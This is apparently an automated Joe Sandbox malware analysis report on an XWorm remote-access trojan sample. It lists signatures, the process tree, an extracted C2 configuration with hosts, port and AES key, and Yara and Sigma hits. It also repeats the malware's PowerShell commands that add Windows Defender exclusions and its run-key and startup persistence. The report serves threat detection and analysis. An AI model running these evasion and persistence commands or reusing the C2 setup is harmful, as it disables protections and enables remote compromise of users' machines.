Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zvas34nq1T.exe

Overview

General Information

Sample name:Zvas34nq1T.exe
renamed because original name is a hash value
Original sample name:95e1104df5d9080402316949de1137c886f9d53d884cee12d10af499f41d5ac1.exe
Analysis ID:1543338
MD5:3830ea8c8b7a7730a6446ca3c8a61180
SHA1:cf9e202a5d5139e7e5ee375653397f0dbd5b11a6
SHA256:95e1104df5d9080402316949de1137c886f9d53d884cee12d10af499f41d5ac1
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Zvas34nq1T.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\Zvas34nq1T.exe" MD5: 3830EA8C8B7A7730A6446CA3C8A61180)
    • powershell.exe (PID: 7368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorer.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: 3830EA8C8B7A7730A6446CA3C8A61180)
  • explorer.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Roaming\explorer.exe" MD5: 3830EA8C8B7A7730A6446CA3C8A61180)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "develop-versions.gl.at.ply.gg", "develop-versions.gl.at.ply.gg:65059", "have-lucia.gl.at.ply.gg"], "Port": "65059", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Zvas34nq1T.exeJoeSecurity_XWormYara detected XWormJoe Security
    Zvas34nq1T.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7953:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x79f0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7b05:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x77c5:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\explorer.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\explorer.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7953:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x79f0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7b05:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x77c5:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x7753:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x77f0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x7905:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x75c5:$cnc4: POST / HTTP/1.1
        Process Memory Space: Zvas34nq1T.exe PID: 7276JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.Zvas34nq1T.exe.e10000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.Zvas34nq1T.exe.e10000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x7953:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x79f0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7b05:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x77c5:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Zvas34nq1T.exe, ProcessId: 7276, TargetFilename: C:\Users\user\AppData\Roaming\explorer.exe
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zvas34nq1T.exe", ParentImage: C:\Users\user\Desktop\Zvas34nq1T.exe, ParentProcessId: 7276, ParentProcessName: Zvas34nq1T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', ProcessId: 7368, ProcessName: powershell.exe
            Sigma detected: System File Execution Location Anomaly
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\explorer.exe" , CommandLine: "C:\Users\user\AppData\Roaming\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Roaming\explorer.exe" , ProcessId: 5328, ProcessName: explorer.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zvas34nq1T.exe", ParentImage: C:\Users\user\Desktop\Zvas34nq1T.exe, ParentProcessId: 7276, ParentProcessName: Zvas34nq1T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', ProcessId: 7368, ProcessName: powershell.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\explorer.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Zvas34nq1T.exe, ProcessId: 7276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zvas34nq1T.exe", ParentImage: C:\Users\user\Desktop\Zvas34nq1T.exe, ParentProcessId: 7276, ParentProcessName: Zvas34nq1T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', ProcessId: 7368, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Zvas34nq1T.exe, ProcessId: 7276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zvas34nq1T.exe", ParentImage: C:\Users\user\Desktop\Zvas34nq1T.exe, ParentProcessId: 7276, ParentProcessName: Zvas34nq1T.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe', ProcessId: 7368, ProcessName: powershell.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Zvas34nq1T.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\explorer.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
            Found malware configuration
            Source: Zvas34nq1T.exeMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "develop-versions.gl.at.ply.gg", "develop-versions.gl.at.ply.gg:65059", "have-lucia.gl.at.ply.gg"], "Port": "65059", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\explorer.exeReversingLabs: Detection: 89%
            Multi AV Scanner detection for submitted file
            Source: Zvas34nq1T.exeReversingLabs: Detection: 89%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\explorer.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Zvas34nq1T.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: Zvas34nq1T.exeString decryptor: 127.0.0.1,develop-versions.gl.at.ply.gg,develop-versions.gl.at.ply.gg:65059,have-lucia.gl.at.ply.gg
            Source: Zvas34nq1T.exeString decryptor: 65059
            Source: Zvas34nq1T.exeString decryptor: <123456789>
            Source: Zvas34nq1T.exeString decryptor: <Xwormmm>
            Source: Zvas34nq1T.exeString decryptor: jjsploit
            Source: Zvas34nq1T.exeString decryptor: USB.exe
            Source: Zvas34nq1T.exeString decryptor: %AppData%
            Source: Zvas34nq1T.exeString decryptor: explorer.exe
            Source: Zvas34nq1T.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Zvas34nq1T.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 127.0.0.1
            Source: Malware configuration extractorURLs: develop-versions.gl.at.ply.gg
            Source: Malware configuration extractorURLs: develop-versions.gl.at.ply.gg:65059
            Source: Malware configuration extractorURLs: have-lucia.gl.at.ply.gg
            Source: global trafficTCP traffic: 192.168.2.4:49789 -> 147.185.221.21:65059
            Source: global trafficTCP traffic: 192.168.2.4:49928 -> 147.185.221.23:65059
            Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
            Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: develop-versions.gl.at.ply.gg
            Source: global trafficDNS traffic detected: DNS query: have-lucia.gl.at.ply.gg
            Source: powershell.exe, 00000001.00000002.1781097013.00000150472B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: powershell.exe, 00000004.00000002.1895371135.0000016078CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros4
            Source: powershell.exe, 00000001.00000002.1773649556.000001503EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1877214143.0000016070523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2019038744.0000028490073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1755806750.000001502EF59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160606DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: Zvas34nq1T.exe, 00000000.00000002.2947487566.0000000003171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1755806750.000001502ED31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160604B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BD31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.1755806750.000001502EF59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160606DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1755806750.000001502ED31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1815384516.00000160604B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930477445.0000028480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2087111004.000002440BD31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000B.00000002.2087111004.000002440BF59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1773649556.000001503EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1877214143.0000016070523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2019038744.0000028490073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222249773.000002441BDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Operating System Destruction

            barindex
            Protects its processes via BreakOnTermination flag
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess information set: 01 00 00 00 Jump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Zvas34nq1T.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeCode function: 0_2_00007FFD9B890E690_2_00007FFD9B890E69
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9530E91_2_00007FFD9B9530E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9739D14_2_00007FFD9B9739D1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8853F29_2_00007FFD9B8853F2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8A53F211_2_00007FFD9B8A53F2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B9730E911_2_00007FFD9B9730E9
            Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 13_2_00007FFD9B880E6913_2_00007FFD9B880E69
            Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 14_2_00007FFD9B890E6914_2_00007FFD9B890E69
            Source: Zvas34nq1T.exe, 00000000.00000000.1682816703.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs Zvas34nq1T.exe
            Source: Zvas34nq1T.exeBinary or memory string: OriginalFilenameXClient.exe4 vs Zvas34nq1T.exe
            Source: Zvas34nq1T.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Zvas34nq1T.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.Zvas34nq1T.exe.e10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Zvas34nq1T.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: Zvas34nq1T.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: Zvas34nq1T.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: explorer.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: explorer.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: explorer.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: Zvas34nq1T.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Zvas34nq1T.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: explorer.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: explorer.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@15/20@2/3
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeMutant created: \Sessions\1\BaseNamedObjects\F3euhgbNmjl7pCCb
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02jzship.30p.ps1Jump to behavior
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
            Source: Zvas34nq1T.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Zvas34nq1T.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Zvas34nq1T.exeReversingLabs: Detection: 89%
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeFile read: C:\Users\user\Desktop\Zvas34nq1T.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Zvas34nq1T.exe "C:\Users\user\Desktop\Zvas34nq1T.exe"
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Zvas34nq1T.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
